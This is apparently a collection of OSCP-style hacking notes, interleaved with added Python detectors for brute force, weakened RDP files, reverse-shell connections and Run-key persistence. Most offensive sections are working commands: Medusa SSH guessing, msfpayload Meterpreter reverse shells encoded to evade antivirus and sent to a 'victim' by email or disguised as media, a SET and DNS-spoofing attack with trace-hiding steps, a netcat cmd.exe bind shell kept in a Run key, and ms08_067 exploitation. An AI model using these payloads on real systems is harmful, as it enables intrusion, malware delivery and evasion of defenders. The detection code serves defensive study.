
Random Oscp Notes


medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output
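
The Medusa line above guesses SSH passwords; on the target it leaves a burst of `Failed password` lines from one source in the sshd auth log. The following is an added example (not part of these notes) of the detection a defender would run over such logs: it parses constructed sample lines in the standard OpenSSH syslog format, counts failures per source IP in a sliding window, and raises a second, higher-severity alert if the same source then gets an `Accepted` login. The year (syslog lines carry none), the threshold and the window length are assumptions set as parameters.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log lines (standard OpenSSH syslog format; not from a real host).
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:02 bastion sshd[2101]: Failed password for root from 10.0.0.5 port 51234 ssh2
Mar  3 10:01:03 bastion sshd[2102]: Failed password for invalid user admin from 10.0.0.5 port 51235 ssh2
Mar  3 10:01:03 bastion sshd[2103]: Failed password for root from 10.0.0.5 port 51236 ssh2
Mar  3 10:01:04 bastion sshd[2104]: Failed password for root from 10.0.0.5 port 51237 ssh2
Mar  3 10:01:05 bastion sshd[2105]: Failed password for root from 10.0.0.5 port 51238 ssh2
Mar  3 10:01:06 bastion sshd[2106]: Accepted password for root from 10.0.0.5 port 51239 ssh2
Mar  3 10:07:00 bastion sshd[2150]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Mar  3 10:07:30 bastion sshd[2151]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for an sshd auth line, or None.
    syslog lines carry no year, so one is assumed (parameter)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert once per source IP that reaches `threshold` failed logins inside a
    sliding window of `window_seconds`, and again (higher severity) if that IP
    later gets an Accepted login. Returns the alerts in log order."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        window = recent[ip]
        if result == "Failed":
            window.append(ts)
            # Drop failures that fell out of the window before counting.
            while window and (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append({"kind": "bruteforce", "ip": ip, "failures": len(window)})
        elif result == "Accepted" and ip in alerted:
            alerts.append({"kind": "success_after_bruteforce", "ip": ip, "user": user})
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

On the sample data the guessing source trips the threshold on its fifth failure and the later `Accepted password` from the same address produces the second alert; the single failure from `192.0.2.10` stays silent. The `success_after_bruteforce` case is the one worth paging on, since it means a guessed password actually worked.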

## Add a personal banner to Metasploit ##

Hi
I know you're gonna love this one :)
I was playing with Metasploit until I opened a folder called "UI".
Then I had an idea that I am going to share with you :)

How to make your own banner and add it to Metasploit?
Go into this directory:
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and check out the content of every file, for example test.rb.

You can use this website to get nice banner templates:

http://patorjk.com/software/taag/

When you have made your own banner you need to give it a name and save it as ".txt".
Place it in the /logos directory.
Now open the file banner.rb and add your personal txt file (as shown in the photo).
Save and exit.

That's it, enjoy Metasploit ;)
#########################
########## How to bypass RDP authentication ##########

RDP = Remote Desktop Protocol.

In this tutorial I will show you how to bypass the authentication window when trying to connect to a Windows box on port 3389 (the default RDP port).
Unfortunately we will need to use a Windows box for it to work.

This is how an RDP client looks on Windows:
Let's say you need to connect to a remote Windows desktop; after entering the IP, click Connect.
This window will appear:
You will be asked to enter a password for the remote machine. Do not worry about it if you don't have it.
Go back to the Remote Desktop Connection window and click on Show Options.
This window will appear:
Click on Save As and save it on your desktop; it will look like this:
Right click it > Open with > Notepad

Change "authentication level:i:2" to "authentication level:i:0". What this does is take all the security measures away from connecting. Like this:

Scroll down to the bottom of the Notepad window and add "enablecredsspsupport:i:0". Now press "Ctrl + S" to save that. Like this:

Now open the Remote Desktop Connection file we have just made.

You should get the regular Remote Desktop Connection window. Enter an IP address and click "Connect".

You should get a screen that looks like this. Click "Connect" and it should connect you. If it brings up the credentials screen, enter your password and click "OK";

it will work now.

You will get this message; click "Yes".

And voilà:
Enjoy the tutorial and DO NOT TRY IT ON A BOX THAT IS NOT YOURS OR THAT YOU HAVE NO PERMISSION TO CONNECT TO.
TCP connections are traceable.
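
The two edits above only change the client side: `enablecredsspsupport:i:0` stops the client from doing CredSSP (Network Level Authentication), and `authentication level:i:0` makes it connect without warning even when the server's identity cannot be verified. A server configured to require NLA refuses such a client before any logon screen appears, which is the server-side mitigation; on the endpoint side, saved `.rdp` files with these values are worth flagging. The following is an added example (not from these notes) of that audit: a parser for the `key:type:value` format of `.rdp` files and a check over two constructed files, one weakened exactly as described above and one left at its defaults. The default values assumed for absent keys (2 and 1) are what mstsc writes in a freshly saved file.

```python
# Constructed .rdp file contents (not captured from a real host). The first is the
# weakened client file the steps above produce; the second keeps the defaults.
WEAKENED_RDP = """\
screen mode id:i:2
full address:s:192.0.2.20
username:s:John
authentication level:i:0
enablecredsspsupport:i:0
"""

DEFAULT_RDP = """\
screen mode id:i:2
full address:s:192.0.2.20
username:s:John
authentication level:i:2
enablecredsspsupport:i:1
"""

def parse_rdp(text):
    """Parse the 'key:type:value' lines of an .rdp file into a dict.
    Type 'i' values become ints; blank or malformed lines are skipped.
    The value may itself contain ':' (e.g. an IPv6 address), hence maxsplit=2."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3:
            continue
        key, typ, value = parts
        if typ == "i":
            try:
                value = int(value)
            except ValueError:
                continue
        settings[key] = value
    return settings

def audit_rdp(text):
    """Return a list of findings for settings that weaken the client side of the
    connection. Absent keys are treated as the mstsc defaults (assumed: 2 and 1)."""
    s = parse_rdp(text)
    findings = []
    level = s.get("authentication level", 2)
    if level == 0:
        findings.append("authentication level:i:0 - connects without warning even if "
                        "server authentication fails")
    elif level not in (1, 2):
        findings.append(f"authentication level:i:{level} - non-default value, review")
    if s.get("enablecredsspsupport", 1) == 0:
        findings.append("enablecredsspsupport:i:0 - CredSSP/NLA disabled on the client; "
                        "a server that requires NLA will refuse this connection")
    return findings

def is_weakened(text):
    return bool(audit_rdp(text))

if __name__ == "__main__":
    for name, content in (("weakened", WEAKENED_RDP), ("default", DEFAULT_RDP)):
        print(name, audit_rdp(content) or "no findings")
```

Pointing `audit_rdp` at the `.rdp` files found under users' profiles gives a quick inventory of clients that have been told to skip NLA and to ignore server-identity failures; the second finding is also a useful hint when an admin asks why a client "stopped being able to connect" after NLA was enforced.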

###################
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 X > /root/Desktop/n1tr0g3n.exe
LHOST = your BackTrack IP address or attacking computer's IP address, which will be waiting for the connection with Meterpreter.

LPORT = default port Metasploit uses ("just use it ;)").

/root/Desktop/n1tr0g3n.exe = path and name you want for the .exe (make sure to name it with the .exe extension so Windows knows how to run it).

Output should look something like this when it's done.

Here's the command to encode the file eight times using x86/shikata_ga_nai, for those of you who might ask anyway and want to try and get it undetectable by AVs ;)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe -x /root/n1tr0g3n.exe -o /root/n1tr0g3n.exe

Just change the .exe name, LPORT and LHOST to the ones you need and you'll be good.

Now send this file to a user through email, or on a jump drive if you're on the same network, and tell them to open it up; it will execute and connect back to the listener automatically.
Now we're going to set up a listener with Meterpreter waiting for the connection from the victim.

Open up a terminal and type
msfconsole
Once Metasploit loads up, type

use exploit/multi/handler                 ----->  exploit you will be using

set LHOST 192.168.1.15       ------>  your BackTrack machine or attacker machine's IP address once again

set LPORT 4444                 ---->  same default port Metasploit uses and the one you chose while creating the .exe

set PAYLOAD windows/meterpreter/reverse_tcp             ------>  payload used for the reverse connection back to you.

exploit                      -------->  to officially start the listener

Now go over to your Windows box ("victim"), double click the executable and watch as Meterpreter opens a session; you should immediately have an open session on the exploited

box and have full control.

There's a lot you can do with this, but you may want to bind the file to an mp3 or jpeg so when the victim opens it they get a generic error and don't actually know what

happened in the background. We know what happened and would be suspicious, but most people barely know how to surf the web, so attacks like this can get through really easily

 :D
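
Encoding the payload changes its bytes, not what it does: once opened, the executable makes an outbound TCP connection from a file in a user-writable folder to the handler on LPORT (4444 by default, as above). That behaviour is what a defender can watch for regardless of how many encoder passes were used. The following is an added example (not from these notes) of that detection over constructed network-connection events in a simplified pipe-delimited form loosely modelled on Sysmon event ID 3; the field layout, the handler-port set and the list of user-writable path markers are assumptions made for the example.

```python
from dataclasses import dataclass

# Constructed network-connection events (not captured from a real host), one per line:
# timestamp|event id|image|pid|src ip|src port|dst ip|dst port|protocol
SAMPLE_EVENTS = """\
2024-03-03T10:15:01Z|3|C:\\Users\\john\\Downloads\\n1tr0g3n.exe|1337|10.0.0.7|54321|192.168.1.15|4444|tcp
2024-03-03T10:15:02Z|3|C:\\Program Files\\Mozilla Firefox\\firefox.exe|2200|10.0.0.7|54322|203.0.113.8|443|tcp
2024-03-03T10:15:03Z|3|C:\\Users\\john\\AppData\\Local\\Temp\\update.exe|2301|10.0.0.7|54323|198.51.100.9|443|tcp
2024-03-03T10:15:04Z|3|C:\\Windows\\System32\\svchost.exe|900|10.0.0.7|54324|10.0.0.1|53|udp
"""

# Metasploit's default LPORT, which the tutorial above keeps. Extend with the ports
# your own handlers or past incidents used (assumed set for this example).
DEFAULT_HANDLER_PORTS = {4444}
# Path fragments that an unprivileged user can normally write to (assumed list).
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

@dataclass
class NetEvent:
    ts: str
    image: str
    pid: int
    dst_ip: str
    dst_port: int
    proto: str

def parse_event(line):
    """Parse one pipe-delimited event line; returns None for anything that is not
    a well-formed network-connection (id 3) event."""
    fields = line.strip().split("|")
    if len(fields) != 9 or fields[1] != "3":
        return None
    ts, _, image, pid, _, _, dst_ip, dst_port, proto = fields
    try:
        return NetEvent(ts, image, int(pid), dst_ip, int(dst_port), proto)
    except ValueError:
        return None

def classify(ev):
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    if ev.proto == "tcp" and ev.dst_port in DEFAULT_HANDLER_PORTS:
        reasons.append("default_handler_port")
    image = ev.image.lower()
    if any(marker in image for marker in USER_WRITABLE_MARKERS):
        reasons.append("user_writable_image")
    return reasons

def find_suspicious(lines):
    """Return (image, dst_ip, dst_port, reasons) for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            hits.append((ev.image, ev.dst_ip, ev.dst_port, reasons))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

The dropped executable trips both rules (handler port plus a path under `\Users\`); the `Temp\update.exe` connection to 443 trips only the path rule and would be the kind of lower-confidence hit to correlate with a fresh file-creation event, while Firefox and svchost stay clean. Treating the two reasons as a score rather than a single boolean keeps the port rule useful even when an attacker picks a different LPORT, as the later notes on this page do.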


Might I suggest using msfencode and using the shikata_ga_nai permutation a couple of times to get it past AV and FW???

=) I know you already know this though!!!

To reduce detection it's best to use diverse encoding options.

A bit like this:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe


Also, if you want to use the exploit, it's best to test with AV on your local machine to avoid sites like VirusTotal passing it on to AV vendors.

Could I suggest a different file type???

.VBS is not scanned by AV and works, I would say, 98% of the time =)


#################

Greetings
** This tutorial is an explanation (not detailed), therefore it is not for beginners; you need to be familiar with several steps:
-Proxy & SOCKS
-Ettercap and DNS spoofing
-Metasploit
-SET
-Netcat
-Registry editing

Let's begin

1 Start computer, connect and get a proxy.

2 DISCONNECT FROM INTERNET, SAVE PROXY INFO BUT DON'T RUN

3 Change hostname & hosts file, then restart computer

4 Then sign in (not connected to network) and change MAC

5 Open up Firefox (still not connected) and enter proxy info

(optional: log into router and turn logging and firewall off)

6 Connect to internet.

7 Run nmap and EtherApe (optional: Wireshark)

8 cp /pentest/windows-binaries/tools/nc.exe /root/Desktop

9 Run SET, use the Java attack to start a Meterpreter session

10 DNS spoof the network


Now wait for the victim to download the fake update and you will get a Meterpreter shell.

sessions -i (session # i.e. 1)

**when meterpreter session connected**

(you'll need to have netcat copied to the desktop)

11 upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v System -d "c:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"


Check it by enumerating the same key you just wrote to:

reg enumkey -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


-then-

spoof anything, add users, create folders/documents, take screenshots, kill processes, etc. etc. etc.

Then type:

reboot

Then to connect:

nc (ip address) 1111

Enjoy ;) Do not be destructive.
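
The persistence step above leaves a very recognisable trace: a `Run` value whose data is a netcat binary in `system32` with listen (`-L`/`-l`), port (`-p`) and shell-exec (`-e cmd.exe`) arguments, under an innocuous name like `System`. The following is an added example (not from these notes) of the audit a defender would run over the `Run` keys: a parser for `reg query`-style output and a rule set that flags exactly those features. The sample output is constructed; the netcat file names and the regular expressions are assumptions chosen for the example, and both the HKCU key written above and its HKLM counterpart should be fed through it.

```python
import re

# Constructed output in the shape of `reg query HKCU\Software\...\Run` (not captured
# from a real host). The second value is the netcat listener the steps above install.
SAMPLE_REG_QUERY = """\

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\john\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    System    REG_SZ    c:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe
"""

# reg query prints "    <name>    <type>    <data>" with runs of spaces as separators.
VALUE_RE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
# Netcat binary names (assumed list); matched as a whole file name after a separator.
NETCAT_RE = re.compile(r'(?:^|[\\/\s"])(?:nc|ncat|netcat|nc64)\.exe\b', re.I)
SHELL_EXEC_RE = re.compile(r"(^|\s)-e\s+(cmd(\.exe)?|powershell(\.exe)?)\b", re.I)
LISTEN_RE = re.compile(r"(^|\s)-[lL](\s|$)")
PORT_RE = re.compile(r"(^|\s)-p\s+(?P<port>\d{1,5})(\s|$)")

def parse_reg_query(text):
    """Return (key, [(name, type, data), ...]) from reg query style output."""
    key, values = None, []
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"]))
    return key, values

def audit_run_values(text):
    """Flag Run values whose command looks like a netcat bind shell. Each finding
    lists the reasons so an analyst can see which rule fired."""
    key, values = parse_reg_query(text)
    findings = []
    for name, _, data in values:
        reasons = []
        if NETCAT_RE.search(data):
            reasons.append("netcat_binary")
        if SHELL_EXEC_RE.search(data):
            reasons.append("shell_exec_flag")
        if LISTEN_RE.search(data):
            reasons.append("listen_flag")
        port = PORT_RE.search(data)
        if port:
            reasons.append(f"listen_port:{port['port']}")
        if reasons:
            findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_run_values(SAMPLE_REG_QUERY):
        print(finding)
```

On the sample the legitimate OneDrive entry produces nothing while the `System` value fires all four rules, including the listening port, which is also the port to look for in `netstat -ano` output or in firewall logs on the host after the reboot the steps above rely on. Because the value was written to HKCU, it survives only for that user; an HKLM entry would need the same audit with the other hive.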

#################


set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15

# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

# So when you input anything where there is [], remember to remove the []

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_bind_tcp
set target 12
set lport 123
set rhost 192.168.177.131
exploit -i

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_reverse_tcp
set target 12
set lport 123
set lhost 192.168.177.128
set rhost 192.168.177.131
exploit -i

use exploit/multi/handler
set lhost 192.168.2.7
set lport 443
set payload windows/meterpreter/reverse_tcp

############################

